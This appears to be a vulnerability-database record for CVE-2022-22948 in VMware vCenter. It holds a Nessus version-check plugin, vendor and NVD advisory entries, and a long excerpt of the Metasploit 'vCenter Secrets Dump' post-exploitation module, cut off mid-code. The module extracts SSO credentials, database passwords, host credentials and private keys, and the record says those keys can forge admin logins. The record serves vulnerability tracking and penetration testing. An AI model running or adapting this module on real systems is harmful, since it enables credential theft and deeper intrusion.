The version of VMware vCenter Server installed on the remote host is 6.5 prior to 6.5 U3r, 6.7 prior to 6.7 U3p, or 7.0 prior to 7.0 U3d. It is, therefore, affected by an information disclosure vulnerability due to improper permission of files. A malicious actor with non-administrative access to the vCenter Server may exploit this issue to gain access to sensitive information.
Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number. Nessus has also not tested for the presence of a workaround.
{"id": "VMWARE_VCENTER_VMSA-2022-0009.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "VMware vCenter Server 6.5 / 6.7 / 7.0 Information Disclosure (VMSA-2022-0009)", "description": "The version of VMware vCenter Server installed on the remote host is 6.5 prior to 6.5 U3r, 6.7 prior to 6.7 U3p, or 7.0 prior to 7.0 U3d. It is, therefore, affected by an information disclosure vulnerability due to improper permission of files. A malicious actor with non-administrative access to the vCenter Server may exploit this issue to gain access to sensitive information.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number. Nessus has also not tested for the presence of a workaround.", "published": "2022-03-29T00:00:00", "modified": "2022-12-05T00:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE", "baseScore": 4.0}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, "href": "https://www.tenable.com/plugins/nessus/159306", "reporter": "This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.pentera.io/blog/information-disclosure-in-vmware-vcenter/", "https://www.vmware.com/security/advisories/VMSA-2022-0009.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22948"], "cvelist": ["CVE-2022-22948"], "immutableFields": [], "lastseen": "2023-01-10T19:18:57", "viewCount": 19, "enchantments": {"score": {"value": -0.7, "vector": "NONE"}, "dependencies": {"references": [{"type": "cnvd", "idList": ["CNVD-2022-55066"]}, {"type": "cve", "idList": ["CVE-2022-22948"]}, {"type": "githubexploit", "idList": ["85297C63-422A-5704-8CDD-A701EF92E0C1"]}, {"type": "metasploit", "idList": ["MSF:POST-LINUX-GATHER-VCENTER_SECRETS_DUMP-"]}, {"type": "vmware", "idList": ["VMSA-2022-0009", "VMSA-2022-0009.1"]}]}, "vulnersScore": -0.7}, "_state": {"score": 1673378620, "dependencies": 1673378777}, "_internal": {"score_hash": "a85c0ebf3351a68fccbab85750f64fb2"}, "pluginID": "159306", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159306);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2022-22948\");\n script_xref(name:\"IAVA\", value:\"2022-A-0127\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0011\");\n\n script_name(english:\"VMware vCenter Server 6.5 / 6.7 / 7.0 Information Disclosure (VMSA-2022-0009)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization management application installed on the remote host is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Server installed on the remote host is 6.5 prior to 6.5 U3r, 6.7 prior to 6.7 U3p, or\n7.0 prior to 7.0 U3d. It is, therefore, affected by an information disclosure vulnerability due to improper permission\nof files. A malicious actor with non-administrative access to the vCenter Server may exploit this issue to gain access\nto sensitive information.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version \nnumber. Nessus has also not tested for the presence of a workaround.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2022-0009.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.pentera.io/blog/information-disclosure-in-vmware-vcenter/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Server 6.5 U3r, 6.7 U3p, or 7.0 U3d or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22948\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vcenter_detect.nbin\");\n script_require_keys(\"Host/VMware/vCenter\", \"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::vmware_vcenter::get_app_info();\n\n# audit out if we're on 6.5 or 6.7 since only the Virtual Appliance version is vuln, while the Windows version isn't\n# affected, and we can't tell the difference\nif (app_info.version =~ \"^6\\.[57]\\.\" && report_paranoia < 2)\n audit(AUDIT_POTENTIAL_VULN, app_info.app, app_info.display_version, app_info.port);\n\nvar constraints = [\n { 'min_version' : '6.5', 'fixed_version' : '6.5.18711281', 'fixed_display' : '6.5 U3r' },\n { 'min_version' : '6.7', 'fixed_version' : '6.7.18831049', 'fixed_display' : '6.7 U3p' },\n { 'min_version' : '7.0', 'fixed_version' : '7.0.19480866', 'fixed_display' : '7.0 U3d' }\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_WARNING\n);\n", "naslFamily": "Misc.", "cpe": ["cpe:/a:vmware:vcenter_server"], "solution": "Upgrade to VMware vCenter Server 6.5 U3r, 6.7 U3p, or 7.0 U3d or later.", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2022-22948", "vendor_cvss2": {"score": 4, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "vendor_cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"}, "vpr": {"risk factor": "Low", "score": "3.6"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2022-03-29T00:00:00", "vulnerabilityPublicationDate": "2022-03-29T00:00:00", "exploitableWith": []}
{"vmware": [{"lastseen": "2022-11-02T11:54:02", "description": "3\\. vCenter Server information disclosure vulnerability (CVE-2022-22948) \n\nThe vCenter Server contains an information disclosure vulnerability due to improper permission of files. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.5.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-29T00:00:00", "type": "vmware", "title": "VMware vCenter Server updates address an information disclosure vulnerability (CVE-2022-22948)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22948"], "modified": "2022-05-18T00:00:00", "id": "VMSA-2022-0009.1", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0009.1.html", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2022-05-26T00:56:09", "description": "3\\. vCenter Server information disclosure vulnerability (CVE-2022-22948) \n\nThe vCenter Server contains an information disclosure vulnerability due to improper permission of files. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.5.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-29T00:00:00", "type": "vmware", "title": "VMware vCenter Server updates address an information disclosure vulnerability (CVE-2022-22948)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22948"], "modified": "2022-03-29T00:00:00", "id": "VMSA-2022-0009", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0009.html", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2022-04-08T14:36:59", "description": "The vCenter Server contains an information disclosure vulnerability due to improper permission of files. A malicious actor with non-administrative access to the vCenter Server may exploit this issue to gain access to sensitive information.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-29T18:15:00", "type": "cve", "title": "CVE-2022-22948", "cwe": ["CWE-276"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22948"], "modified": "2022-04-08T12:58:00", "cpe": ["cpe:/a:vmware:vcenter_server:6.7", "cpe:/a:vmware:vcenter_server:6.5", "cpe:/a:vmware:cloud_foundation:3.11", "cpe:/a:vmware:vcenter_server:7.0"], "id": "CVE-2022-22948", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22948", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:vmware:vcenter_server:6.5:update3f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3p:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update2a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update3c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update3a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3l:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3j:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update2d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update1d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update2b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update1a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3k:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:e:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update3:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3n:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3n:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update1:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1e:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3o:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.11:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3q:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update1b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update1:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update1c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update2c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3m:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update2:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:c:*:*:*:*:*:*"]}], "cnvd": [{"lastseen": "2022-08-15T17:48:06", "description": "VMware vCenter Server is a suite of server and virtualization management software from Vmware, Inc. VMware vCenter Server is vulnerable to an information disclosure vulnerability that could be exploited by an attacker with unmanaged access to gain access to sensitive information.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-31T00:00:00", "type": "cnvd", "title": "VMware vCenter Server Information Disclosure Vulnerability (CNVD-2022-55066)", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22948"], "modified": "2022-08-03T00:00:00", "id": "CNVD-2022-55066", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-55066", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "githubexploit": [{"lastseen": "2022-08-16T06:05:48", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-17T09:59:20", "type": "githubexploit", "title": "Exploit for Incorrect Default Permissions in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22948"], "modified": "2022-08-03T05:46:44", "id": "85297C63-422A-5704-8CDD-A701EF92E0C1", "href": "", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "privateArea": 1}], "metasploit": [{"lastseen": "2022-12-05T20:47:20", "description": "Grab secrets and keys from the vCenter server and add them to loot. This module is tested against the vCenter appliance only; it will not work on Windows vCenter instances. It is intended to be run after successfully acquiring root access on a vCenter appliance and is useful for penetrating further into the environment following a vCenter exploit that results in a root shell. Secrets include the dcAccountDN and dcAccountPassword for the vCenter machine which can be used for maniuplating the SSO domain via standard LDAP interface; good for plugging into the vmware_vcenter_vmdir_ldap module or for adding new SSO admin users. The MACHINE_SSL, VMCA_ROOT and SSO IdP certificates with associated private keys are also plundered and can be used to sign forged SAML assertions for the /ui admin interface.\n", "cvss3": {}, "published": "2022-08-06T18:01:56", "type": "metasploit", "title": "VMware vCenter Secrets Dump", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22948"], "modified": "2022-11-19T15:37:36", "id": "MSF:POST-LINUX-GATHER-VCENTER_SECRETS_DUMP-", "href": "https://www.rapid7.com/db/modules/post/linux/gather/vcenter_secrets_dump/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/credential_collection'\nrequire 'metasploit/framework/hashes'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Common\n include Msf::Post::File\n include Msf::Auxiliary::Report\n include Msf::Post::Linux::Priv\n include Msf::Post::Vcenter::Vcenter\n include Msf::Post::Vcenter::Database\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Secrets Dump',\n 'Description' => %q{\n Grab secrets and keys from the vCenter server and add them to\n loot. This module is tested against the vCenter appliance only;\n it will not work on Windows vCenter instances. It is intended to\n be run after successfully acquiring root access on a vCenter\n appliance and is useful for penetrating further into the\n environment following a vCenter exploit that results in a root\n shell.\n\n Secrets include the dcAccountDN and dcAccountPassword for\n the vCenter machine which can be used for maniuplating the SSO\n domain via standard LDAP interface; good for plugging into the\n vmware_vcenter_vmdir_ldap module or for adding new SSO admin\n users. The MACHINE_SSL, VMCA_ROOT and SSO IdP certificates with\n associated private keys are also plundered and can be used to\n sign forged SAML assertions for the /ui admin interface.\n },\n 'Author' => [\n 'npm[at]cesium137.io', # original vcenter secrets dump\n 'Erik Wynter', # @wyntererik, postgres additions\n 'h00die' # tying it all together\n ],\n 'Platform' => [ 'linux', 'unix' ],\n 'DisclosureDate' => '2022-04-15',\n 'SessionTypes' => [ 'meterpreter', 'shell' ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [\n 'Dump',\n {\n 'Description' => 'Dump vCenter Secrets'\n }\n ]\n ],\n 'DefaultAction' => 'Dump',\n 'References' => [\n [ 'URL', 'https://github.com/shmilylty/vhost_password_decrypt' ],\n [ 'CVE', '2022-22948' ],\n [ 'URL', 'https://pentera.io/blog/information-disclosure-in-vmware-vcenter/' ],\n [ 'URL', 'https://github.com/ErikWynter/metasploit-framework/blob/vcenter_gather_postgresql/modules/post/multi/gather/vmware_vcenter_gather_postgresql.rb' ]\n ],\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'Reliability' => [ ],\n 'SideEffects' => [ IOC_IN_LOGS ]\n }\n )\n )\n register_advanced_options([\n OptBool.new('DUMP_VMDIR', [ true, 'Extract SSO domain information', true ]),\n OptBool.new('DUMP_VMAFD', [ true, 'Extract vSphere certificates, private keys, and secrets', true ]),\n OptBool.new('DUMP_SPEC', [ true, 'If DUMP_VMAFD is enabled, attempt to extract VM Guest Customization secrets from PSQL', true ]),\n OptBool.new('DUMP_LIC', [ true, 'If DUMP_VMDIR is enabled, attempt to extract vSphere license keys', false ])\n ])\n end\n\n # this is only here because of the SSO portion, which will get moved to the vcenter lib once someone is able to provide output to test against.\n def ldapsearch_bin\n '/opt/likewise/bin/ldapsearch'\n end\n\n def psql_bin\n '/opt/vmware/vpostgres/current/bin/psql'\n end\n\n def vcenter_management\n vc_type_embedded || vc_type_management\n end\n\n def vcenter_infrastructure\n vc_type_embedded || vc_type_infrastructure\n end\n\n def check_cve_2022_22948\n # https://github.com/PenteraIO/CVE-2022-22948/blob/main/CVE-2022-22948-scanner.sh#L5\n cmd_exec('stat -c \"%G\" \"/etc/vmware-vpx/vcdb.properties\"') == 'cis'\n end\n\n def run\n get_vcsa_version\n\n if check_cve_2022_22948\n print_good('Vulnerable to CVE-2022-22948')\n report_vuln(\n host: rhost,\n port: rport,\n name: name,\n refs: ['CVE-2022-22948'],\n info: \"Module #{fullname} found /etc/vmware-vpx/vcdb.properties owned by cis group\"\n )\n end\n\n print_status('Validating target')\n validate_target\n\n print_status('Gathering vSphere SSO domain information')\n vmdir_init\n\n print_status('Extracting PostgreSQL database credentials')\n get_db_creds\n\n print_status('Extract ESXi host vpxuser credentials')\n enum_vpx_user_creds\n\n if datastore['DUMP_VMDIR'] && vcenter_infrastructure\n print_status('Extracting vSphere SSO domain secrets')\n vmdir_dump\n end\n\n if datastore['DUMP_VMAFD']\n print_status('Extracting certificates from vSphere platform')\n vmafd_dump\n if datastore['DUMP_SPEC'] && vcenter_management\n print_status('Searching for secrets in VM Guest Customization Specification XML')\n enum_vm_cust_spec\n end\n end\n\n if is_root?\n print_status('Retrieving .pgpass file')\n retrieved_pg_creds = false\n pgpass_contents = process_pgpass_file\n\n pgpass_contents.each do |p|\n extra_service_data = {\n address: p['hostname'] =~ /localhost|127.0.0.1/ ? Rex::Socket.getaddress(rhost) : p['hostname'],\n port: p['port'],\n service_name: 'psql',\n protocol: 'tcp',\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service\n }\n print_good(\".pgpass creds found: #{p['username']}, #{p['password']} for #{p['hostname']}:#{p['database']}\")\n store_valid_credential(user: p['username'], private: p['password'], service_data: extra_service_data, private_type: :password)\n next if p['database'] != 'postgres'\n\n next unless retrieved_pg_creds == false\n\n creds = query_pg_shadow_values(p['password'], p['username'], p['database'])\n retrieved_pg_creds = true unless creds.nil?\n creds.each do |cred|\n print_good(\"posgres database creds found: #{cred['user']}, #{cred['password_hash']}\")\n credential_data = {\n username: cred['user'],\n private_data: cred['password_hash'],\n private_type: :nonreplayable_hash,\n jtr_format: Metasploit::Framework::Hashes.identify_hash(cred['password_hash'])\n }.merge(extra_service_data)\n\n login_data = {\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::UNTRIED\n }.merge(extra_service_data)\n\n create_credential_login(login_data)\n end\n end\n path = store_loot('.pgpass', 'text/plain', session, pgpass_contents, 'pgpass.json')\n print_good(\"Saving the /root/.pgpass contents to #{path}\")\n end\n end\n\n def vmdir_init\n self.keystore = {}\n\n vsphere_machine_id = get_machine_id\n if is_uuid?(vsphere_machine_id)\n vprint_status(\"vSphere Machine ID: #{vsphere_machine_id}\")\n else\n print_bad('Invalid vSphere PSC Machine UUID returned from vmafd-cli')\n end\n\n vsphere_domain_name = get_domain_name\n unless is_fqdn?(vsphere_domain_name)\n fail_with(Msf::Exploit::Failure::Unknown, 'Could not determine vSphere SSO domain name via lwregshell')\n end\n\n self.base_fqdn = vsphere_domain_name.to_s.downcase\n vprint_status(\"vSphere SSO Domain FQDN: #{base_fqdn}\")\n\n vsphere_domain_dn = 'dc=' + base_fqdn.split('.').join(',dc=')\n self.base_dn = vsphere_domain_dn\n vprint_status(\"vSphere SSO Domain DN: #{base_dn}\")\n\n vprint_status('Extracting dcAccountDN and dcAccountPassword via lwregshell on local vCenter')\n vsphere_domain_dc_dn = get_domain_dc_dn\n unless is_dn?(vsphere_domain_dc_dn)\n fail_with(Msf::Exploit::Failure::Unknown, 'Could not determine vmdir dcAccountDN from lwregshell')\n end\n\n self.bind_dn = vsphere_domain_dc_dn\n print_good(\"vSphere SSO DC DN: #{bind_dn}\")\n self.bind_pw = get_domain_dc_password\n unless bind_pw\n fail_with(Msf::Exploit::Failure::Unknown, 'Could not determine vmdir dcAccountPassword from lwregshell')\n end\n\n print_good(\"vSphere SSO DC PW: #{bind_pw}\")\n # clean up double quotes\n # originally we wrapped in singles, but escaping of single quotes was not working, so prefer doubles\n self.bind_pw = bind_pw.gsub('\"') { '\\\\\"' }\n self.shell_bind_pw = \"\\\"#{bind_pw}\\\"\"\n\n extra_service_data = {\n address: Rex::Socket.getaddress(rhost),\n port: 389,\n service_name: 'ldap',\n protocol: 'tcp',\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n realm_key: Metasploit::Model::Realm::Key::WILDCARD,\n realm_value: base_fqdn\n 